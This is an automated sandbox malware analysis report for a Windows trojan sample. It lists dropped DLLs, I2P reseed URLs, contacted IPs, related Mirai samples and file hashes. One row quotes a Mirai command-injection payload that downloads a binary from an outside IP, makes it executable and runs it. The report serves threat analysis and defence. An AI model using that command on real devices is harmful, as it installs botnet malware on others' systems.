C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll0%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll0%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll0%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll0%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll0%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll0%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe19%ReversingLabsWin64.Trojan.Barys
C:\Windows\Temp\9qaNW6z60%ReversingLabs
C:\Windows\Temp\DYoNFfUY0%ReversingLabs
C:\Windows\Temp\HwfABz7s0%ReversingLabs
C:\Windows\Temp\Jcf8nu5c0%ReversingLabs
C:\Windows\Temp\TLN3Eh0f0%ReversingLabs
C:\Windows\Temp\j8fz8FfX0%ReversingLabs
C:\Windows\Temp\kInii6kX0%ReversingLabs
C:\Windows\Temp\zCUeqzwC0%ReversingLabs
C:\Windows\Temp\zFE1sfMY0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://i2p.ghativega.in/0%Avira URL Cloudsafe
https://i2pseed.creativecowpat.net:8443/0%Avira URL Cloudsafe
https://i2p.novg.net/0%Avira URL Cloudsafe
http://reg.i2p/hosts.txt20%Avira URL Cloudsafe
https://netdb.i2p2.no/0%Avira URL Cloudsafe
https://reseed-fr.i2pd.xyz/0%Avira URL Cloudsafe
https://reseed.i2p-projekt.de/0%Avira URL Cloudsafe
https://reseed.memcpy.io/0%Avira URL Cloudsafe
https://reseed.i2pgit.org/0%Avira URL Cloudsafe
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/0%Avira URL Cloudsafe
http://127.0.0.1:81180%Avira URL Cloudsafe
http://reg.i2p/hosts.txt0%Avira URL Cloudsafe
http://stats.i2p/cgi-bin/newhosts.txt0%Avira URL Cloudsafe
https://reseed-pl.i2pd.xyz/0%Avira URL Cloudsafe
https://reseed.diva.exchange/0%Avira URL Cloudsafe
https://www2.mk16.de/0%Avira URL Cloudsafe
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txti2p.su30%Avira URL Cloudsafe
http://reg.i2p/hosts.txt/0%Avira URL Cloudsafe
http://identiguy.i2p/hosts.txt0%Avira URL Cloudsafe
http://reg.i2p/hosts.txtp_lib.c0%Avira URL Cloudsafe
https://i2p.mooo.com/netDb/0%Avira URL Cloudsafe
http://reg.i2p/hosts.txtR0%Avira URL Cloudsafe
https://legit-website.com/i2pseeds.su30%Avira URL Cloudsafe
https://i2pd.readthedocs.io/en/latest/user-guide/configuration/0%Avira URL Cloudsafe
https://reseed.onion.im/0%Avira URL Cloudsafe
https://reseed.stormycloud.org/0%Avira URL Cloudsafe
https://reseed2.i2p.net/0%Avira URL Cloudsafe
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txttp://0%Avira URL Cloudsafe
http://rus.i2p/hosts.txt0%Avira URL Cloudsafe
https://banana.incognet.io/0%Avira URL Cloudsafe
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt0%Avira URL Cloudsafe
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
https://reseed-fr.i2pd.xyz/dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.drtrue
  • Avira URL Cloud: safe
unknown
https://i2pseed.creativecowpat.net:8443/dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.drtrue
  • Avira URL Cloud: safe
unknown
https://reseed.i2p-projekt.de/dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.drfalse
  • Avira URL Cloud: safe
unknown
https://i2p.novg.net/dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.drtrue
  • Avira URL Cloud: safe
unknown
http://reg.i2p/hosts.txt2main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://netdb.i2p2.no/dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.drfalse
  • Avira URL Cloud: safe
unknown
https://reseed.memcpy.io/dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.drtrue
  • Avira URL Cloud: safe
unknown
https://i2p.ghativega.in/dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.drtrue
  • Avira URL Cloud: safe
unknown
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://reseed.i2pgit.org/dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.drtrue
  • Avira URL Cloud: safe
unknown
https://www2.mk16.de/dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.drtrue
  • Avira URL Cloud: safe
unknown
http://reg.i2p/hosts.txtmain.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2978303418.000001FC7B9B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.2531546601.000001FC7B9B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.2531876609.000001FC7B9B2000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.dr, zCUeqzwC.23.drfalse
  • Avira URL Cloud: safe
unknown
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txti2p.su3main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://reg.i2p/hosts.txt/main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://reseed-pl.i2pd.xyz/dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.drtrue
  • Avira URL Cloud: safe
unknown
http://stats.i2p/cgi-bin/newhosts.txtdx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.drfalse
  • Avira URL Cloud: safe
unknown
http://127.0.0.1:8118dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.drfalse
  • Avira URL Cloud: safe
unknown
http://identiguy.i2p/hosts.txtdx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.drfalse
  • Avira URL Cloud: safe
unknown
https://reseed.diva.exchange/dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.drtrue
  • Avira URL Cloud: safe
unknown
http://reg.i2p/hosts.txtp_lib.cmain.exe, 00000017.00000002.2978303418.000001FC7B9B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.2531546601.000001FC7B9B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.2531876609.000001FC7B9B2000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://legit-website.com/i2pseeds.su3dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.drfalse
  • Avira URL Cloud: safe
unknown
https://reseed.onion.im/dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.drtrue
  • Avira URL Cloud: safe
unknown
https://i2p.mooo.com/netDb/dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.drfalse
  • Avira URL Cloud: safe
unknown
https://i2pd.readthedocs.io/en/latest/user-guide/configuration/dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.drfalse
  • Avira URL Cloud: safe
unknown
http://reg.i2p/hosts.txtRmain.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://reseed.stormycloud.org/dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.drtrue
  • Avira URL Cloud: safe
unknown
https://reseed2.i2p.net/dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.drtrue
  • Avira URL Cloud: safe
unknown
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txttp://main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://banana.incognet.io/dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.drtrue
  • Avira URL Cloud: safe
unknown
http://rus.i2p/hosts.txtdx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.drfalse
  • Avira URL Cloud: safe
unknown
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txtmain.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.dr, zCUeqzwC.23.drfalse
  • Avira URL Cloud: safe
unknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
70.113.162.253
unknownUnited States
11427TWC-11427-TEXASUStrue
184.65.173.183
unknownCanada
6327SHAWCAfalse
68.1.55.11
unknownUnited States
22773ASN-CXA-ALL-CCI-22773-RDCUSfalse
5.19.249.240
unknownRussian Federation
41733ZTELECOM-ASRUfalse
89.89.209.95
unknownFrance
5410BOUYGTEL-ISPFRfalse
213.145.125.139
unknownBulgaria
9070COOOLBOXBGfalse
188.174.130.9
unknownGermany
8767MNET-ASGermanyDEfalse
154.61.58.162
unknownUnited States
203749HN-ASGBfalse
5.104.75.170
unknownRussian Federation
197328INETLTDTRfalse
88.210.6.42
unknownRussian Federation
25308CITYLAN-ASRUtrue
107.189.6.31
unknownUnited States
53667PONYNETUSfalse
135.181.40.188
unknownGermany
24940HETZNER-ASDEfalse
46.51.90.183
unknownIran (ISLAMIC Republic Of)
197207MCCI-ASIRfalse
81.183.201.129
unknownHungary
5483MAGYAR-TELEKOM-MAIN-ASMagyarTelekomNyrtHUfalse
161.65.240.191
unknownNew Zealand
9790VOCUSGROUPNZVocusGroupNZfalse
85.6.171.9
unknownSwitzerland
3303SWISSCOMSwisscomSwitzerlandLtdCHfalse
68.65.178.44
unknownUnited States
46449ASTREA-NORTHWI-WESTUPMIUSfalse
47.250.187.161
unknownUnited States
45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
198.37.222.72
unknownUnited States
10796TWC-10796-MIDWESTUSfalse
85.239.53.47
unknownRussian Federation
134121RAINBOW-HKRainbownetworklimitedHKfalse
74.222.100.29
unknownUnited States
20257FTC-INETUSfalse
188.187.151.89
unknownRussian Federation
41786ERTH-YOLA-ASRUfalse
24.70.217.209
unknownCanada
6327SHAWCAfalse
86.46.70.248
unknownIreland
5466EIRCOMInternetHouseIEfalse
31.13.134.204
unknownRussian Federation
197765ITPARK_DCRUfalse
24.231.176.11
unknownUnited States
20115CHARTER-20115USfalse
101.191.73.121
unknownAustralia
1221ASN-TELSTRATelstraCorporationLtdAUfalse
190.22.24.78
unknownChile
7418TELEFONICACHILESACLfalse
24.51.216.45
unknownUnited States
30404BSCL-11USfalse
78.47.80.55
unknownGermany
24940HETZNER-ASDEfalse
88.156.92.211
unknownPoland
29314VECTRANET-ASAlZwyciestwa25381-525GdyniaPolandPLfalse
99.234.18.44
unknownCanada
812ROGERS-COMMUNICATIONSCAfalse
86.106.93.104
unknownBelize
44901BELCLOUDBGfalse
85.239.63.250
unknownRussian Federation
134121RAINBOW-HKRainbownetworklimitedHKfalse
85.239.52.241
unknownRussian Federation
134121RAINBOW-HKRainbownetworklimitedHKtrue
188.89.23.222
unknownNetherlands
31615TMO-NL-ASNLfalse
194.207.132.221
unknownUnited Kingdom
12390KINGSTON-UK-ASGBfalse
85.230.189.73
unknownSweden
2119TELENOR-NEXTELTelenorNorgeASNOfalse
207.178.119.175
unknownUnited States
35851BANKERSBANKOFKANSASUSfalse
212.118.52.164
unknownRussian Federation
56806ASCOM4SRUfalse
92.95.33.134
unknownFrance
15557LDCOMNETFRfalse
217.10.112.72
unknownSweden
35706NAOSEfalse
66.228.49.30
unknownUnited States
63949LINODE-APLinodeLLCUSfalse
73.246.172.43
unknownUnited States
7922COMCAST-7922USfalse
64.95.13.143
unknownUnited States
31982BRAHMAN-NYUSfalse
176.109.240.152
unknownRussian Federation
41709LDS-UAfalse
141.98.234.85
unknownRussian Federation
41011CH-NET-ASROtrue
45.76.244.95
unknownUnited States
20473AS-CHOOPAUSfalse
99.252.228.84
unknownCanada
812ROGERS-COMMUNICATIONSCAfalse
2.135.133.55
unknownKazakhstan
9198KAZTELECOM-ASKZfalse
139.162.110.14
unknownNetherlands
63949LINODE-APLinodeLLCUSfalse
2.177.52.177
unknownIran (ISLAMIC Republic Of)
12880DCI-ASIRfalse
185.128.245.162
unknownAustria
51184FONIRAATfalse
66.78.40.49
unknownUnited States
46261QUICKPACKETUSfalse
108.227.133.164
unknownUnited States
7018ATT-INTERNET4USfalse
89.219.212.160
unknownIran (ISLAMIC Republic Of)
12880DCI-ASIRfalse
106.68.22.241
unknownAustralia
7545TPG-INTERNET-APTPGTelecomLimitedAUfalse
IP
127.0.0.1
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1516963
Start date and time:2024-09-24 17:45:07 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 10m 29s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:29
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:file.exe
Detection:MAL
Classification:mal96.troj.evad.winEXE@38/136@0/58
EGA Information:
  • Successful, ratio: 60%
HCA Information:Failed
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Execution Graph export aborted for target dx4w727xyq6q2yaxja.exe, PID 3744 because it is empty
  • Execution Graph export aborted for target file.exe, PID 6688 because there are no executed function
  • Not all processes where analyzed, report is missing behavior information
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size exceeded maximum capacity and may have missing network information.
  • Report size getting too big, too many NtCreateKey calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • VT rate limit hit for: file.exe
TimeTypeDescription
11:46:07API Interceptor216x Sleep call for process: file.exe modified
11:46:14API Interceptor50x Sleep call for process: powershell.exe modified
11:47:01API Interceptor711165x Sleep call for process: main.exe modified
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
99.234.18.44skyljne.mpsl.elfGet hashmaliciousMiraiBrowse
  • /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
No context
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
SHAWCASecuriteInfo.com.Linux.Siggen.9999.13221.8731.elfGet hashmaliciousUnknownBrowse
  • 50.72.73.81
SecuriteInfo.com.Linux.Siggen.9999.32167.12194.elfGet hashmaliciousUnknownBrowse
  • 24.82.111.181
ZgBCG135hk.elfGet hashmaliciousMirai, MoobotBrowse
  • 24.69.3.95
mdfh8nJQAy.elfGet hashmaliciousMirai, MoobotBrowse
  • 96.52.28.136
yMg23n1D5d.elfGet hashmaliciousMirai, MoobotBrowse
  • 184.65.83.254
XPK8NKw7Jv.elfGet hashmaliciousMirai, MoobotBrowse
  • 24.70.74.89
O9M84hUenb.elfGet hashmaliciousMirai, OkiruBrowse
  • 50.70.203.45
jydeTkHxMv.elfGet hashmaliciousUnknownBrowse
  • 68.148.70.154
SecuriteInfo.com.Linux.Siggen.9999.8861.1379.elfGet hashmaliciousMiraiBrowse
  • 142.230.62.174
SecuriteInfo.com.Linux.Siggen.9999.15962.9862.elfGet hashmaliciousMiraiBrowse
  • 70.78.77.137
TWC-11427-TEXASUSSecuriteInfo.com.Linux.Siggen.9999.29695.14613.elfGet hashmaliciousUnknownBrowse
  • 72.191.2.31
cQOoKCZyG3.elfGet hashmaliciousMiraiBrowse
  • 70.117.108.32
SecuriteInfo.com.Linux.Siggen.9999.21080.24829.elfGet hashmaliciousMiraiBrowse
  • 70.120.70.106
arm7.elfGet hashmaliciousMirai, MoobotBrowse
  • 76.187.110.110
spc.elfGet hashmaliciousMirai, MoobotBrowse
  • 67.48.82.53
95.214.27.183-x86-2024-09-02T08_52_28.elfGet hashmaliciousUnknownBrowse
  • 66.68.51.160
94.156.71.153-sparc-2024-08-29T17_31_55.elfGet hashmaliciousUnknownBrowse
  • 70.121.73.31
154.213.187.80-mips-2024-08-30T23_29_44.elfGet hashmaliciousMiraiBrowse
  • 66.69.104.43
mirai.m68k.elfGet hashmaliciousMiraiBrowse
  • 75.81.132.111
sora.m68k.elfGet hashmaliciousMiraiBrowse
  • 70.115.6.43
ASN-CXA-ALL-CCI-22773-RDCUSSecuriteInfo.com.Linux.Siggen.9999.29695.14613.elfGet hashmaliciousUnknownBrowse
  • 70.186.61.160
SecuriteInfo.com.Linux.Siggen.9999.32167.12194.elfGet hashmaliciousUnknownBrowse
  • 98.187.110.147
SecuriteInfo.com.Linux.Siggen.9999.11593.30273.elfGet hashmaliciousUnknownBrowse
  • 184.181.236.224
jade.spc.elfGet hashmaliciousMiraiBrowse
  • 68.15.246.82
Tsunami.arm.elfGet hashmaliciousMiraiBrowse
  • 98.160.221.195
mdfh8nJQAy.elfGet hashmaliciousMirai, MoobotBrowse
  • 70.179.119.239
yMg23n1D5d.elfGet hashmaliciousMirai, MoobotBrowse
  • 164.170.79.96
XPK8NKw7Jv.elfGet hashmaliciousMirai, MoobotBrowse
  • 98.187.245.127
nIl2wyif6Q.elfGet hashmaliciousUnknownBrowse
  • 68.8.161.89
jNGMZWmt23.elfGet hashmaliciousMiraiBrowse
  • 184.178.218.247
No context
No context
Process:C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe
File Type:data
Category:dropped
Size (bytes):456
Entropy (8bit):3.2341395630162877
Encrypted:false
SSDEEP:12:Ml8Pi7t8+d/fQfjfEWNfElsfghFfShFfgmSem4emzYWr:k8APd/oj8i8ls0FSFgID7r
MD5:40AB00517F4227F2C3C334F1D16B65B4
SHA1:F8D57AF017E2209B4FB24122647FD7F71B67C87C
SHA-256:4BAF4B78D05A28AF7DEE7DBBCE2B4EDF6053D9239C1756C932BE9F2FEEE4EF85
SHA-512:75D74306F043B864295F09A60C19A43494C226664733C99318989CE5C22CB9395BB407FB5C8C0268AD9184A79813304ED5FC943A6B53DB54F5F225CDA31650E3
Malicious:false
Preview:C.o.m.p.u.t.e.r...{.2.0.d.0.4.f.e.0.-.3.a.e.a.-.1.0.6.9.-.a.2.d.8.-.0.8.0.0.2.b.3.0.3.0.9.d.}.....D.:.A.I.(.D.;.;.F.A.;.;.;.B.U.).(.A.;.;.F.A.;.;.;.B.A.).(.A.;.O.I.C.I.I.D.;.F.A.;.;.;.B.A.).(.A.;.I.D.;.F.A.;.;.;.S.Y.).(.A.;.O.I.C.I.I.O.I.D.;.F.A.;.;.;.C.O.).(.A.;.O.I.C.I.I.O.I.D.;.F.A.;.;.;.S.Y.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.I.U.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.S.U.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.S.-.1.-.5.-.3.).....
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):115200
Entropy (8bit):6.220212606349767
Encrypted:false
SSDEEP:1536:GQTj0nA3CwwEWLUbltMR8tGZ9G+Yv953a6nfgXqobk5l:GQP02C7LUbltdQG+Yra64Xqo45l
MD5:BE6174AE2B452DA9D00F9C7C4D8A675B
SHA1:0ABD2C76C82416AE9C30124C43802E2E49C8ED28
SHA-256:A62BDF318386AAAB93F1D25144CFBDC1A1125AAAD867EFC4E49FE79590181EBF
SHA-512:5631B1595F8CEE8C0DFA991852259FEE17EA8B73A9EED900A10450BBB7C846ACFC88C32930BE379D60EFA6AE1BBBEAD0A605A9F36E20129B53BCA36B13BA5858
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........."h.............................P......7F....`... .........................................^....................................@..l...........................@...(.......................h............................text...(...........................`..`.data........0......................@....rdata..`d...@...f...(..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B........................................................................................................................................................................
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):5081
Entropy (8bit):5.7375437469711486
Encrypted:false
